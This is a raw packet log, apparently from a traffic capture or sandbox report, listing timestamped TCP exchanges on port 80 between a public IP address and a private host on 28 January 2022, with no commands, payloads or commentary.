                                                                                                                                  Jan 28, 2022 21:04:51.673939943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673958063 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673966885 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.673974991 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.673993111 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674001932 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674011946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674029112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674030066 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674046040 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674063921 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674072027 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674082994 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674099922 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674099922 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674114943 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674135923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674196005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674225092 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674237013 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674261093 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674278975 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674293995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674297094 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674312115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674328089 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.674330950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.674390078 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.677716017 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.677730083 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.935740948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935774088 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935834885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.935846090 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.936026096 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.936078072 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967017889 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967044115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967076063 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967103004 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967103958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967135906 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967150927 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967395067 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967427015 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967438936 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967463017 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967479944 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967495918 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.967502117 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.967535019 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.970959902 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.970985889 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.971003056 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.971019030 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.971035004 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.971044064 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.971050978 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.971127987 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.979460955 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979486942 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979502916 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979517937 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979571104 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.979684114 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979729891 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.979793072 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979895115 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979912043 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.979944944 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983261108 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983287096 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983300924 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983392000 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983403921 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983436108 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983508110 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983535051 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983551979 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983581066 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983597040 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983597994 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983623981 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983639956 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983644009 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983656883 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983670950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983674049 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983681917 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983690977 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983711958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983715057 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983730078 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983745098 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983753920 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983762026 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983774900 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983786106 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:51.983804941 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:51.983818054 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.241954088 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.241976023 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.242017984 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.242033958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.242149115 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.272917032 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.272950888 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.272973061 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.272994041 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273021936 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273050070 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273104906 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.273458958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273488998 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273514032 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.273519039 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273545980 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.273547888 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.273593903 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.277126074 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277198076 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277232885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277267933 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277273893 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.277303934 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277309895 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.277487993 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.277548075 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.285917044 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.285960913 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.285998106 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.286032915 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.286037922 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.286068916 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.286077023 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.286108017 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.286149025 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.288980007 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289021969 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289061069 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289067030 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.289100885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289143085 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.289236069 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289277077 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.289321899 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290189981 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290241003 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290278912 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290287018 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290407896 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290451050 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290455103 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290488958 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290529013 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290534973 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290570021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290608883 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290625095 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290649891 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290690899 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290704966 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290730953 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290771008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290774107 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290810108 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290848970 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290849924 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.290889025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.290927887 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.367809057 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.367849112 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.547972918 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548017025 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548033953 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548059940 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548075914 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548091888 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548108101 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548122883 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548146009 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548160076 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548165083 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548183918 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548187017 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548201084 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548218012 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548226118 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548234940 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548250914 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548265934 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548269033 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548284054 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548291922 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548300982 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548319101 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548327923 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548335075 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548352003 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548361063 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548368931 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548384905 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548389912 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548402071 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548418999 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548433065 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548434973 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548453093 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548458099 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548470974 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548486948 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548494101 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548504114 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548521042 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548525095 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548537970 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548553944 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548571110 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548580885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548595905 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548604965 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548610926 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548628092 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548639059 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548644066 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548661947 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548664093 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548679113 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548693895 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548701048 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548711061 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548727036 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548729897 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548743963 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548759937 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548764944 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548775911 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548791885 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548799992 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548810005 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548825979 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548830986 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548842907 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548857927 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.548866034 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.548893929 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.581955910 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.581984043 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.581996918 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582012892 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582029104 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582043886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582060099 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582076073 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582092047 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582102060 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582108021 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582123995 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582134008 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582139015 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582140923 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582159042 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582160950 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582175970 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582192898 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582195997 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582210064 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582226038 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582227945 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582243919 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582258940 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582263947 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582276106 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582292080 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582293034 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582308054 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582324982 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582885027 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582904100 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582931995 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.582940102 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582958937 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582973957 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.582977057 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583009005 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583018064 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583035946 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583053112 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583067894 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583070993 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583097935 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583100080 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583116055 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.583148003 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.583223104 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592597961 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592695951 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592717886 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592719078 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592740059 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592756033 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592763901 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592787027 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592806101 CET4916880192.168.2.22103.138.189.128
                                                                                                                                  Jan 28, 2022 21:04:52.592808008 CET8049168103.138.189.128192.168.2.22
                                                                                                                                  Jan 28, 2022 21:04:52.592829943 CET8049168103.138.189.128192.168.2.22
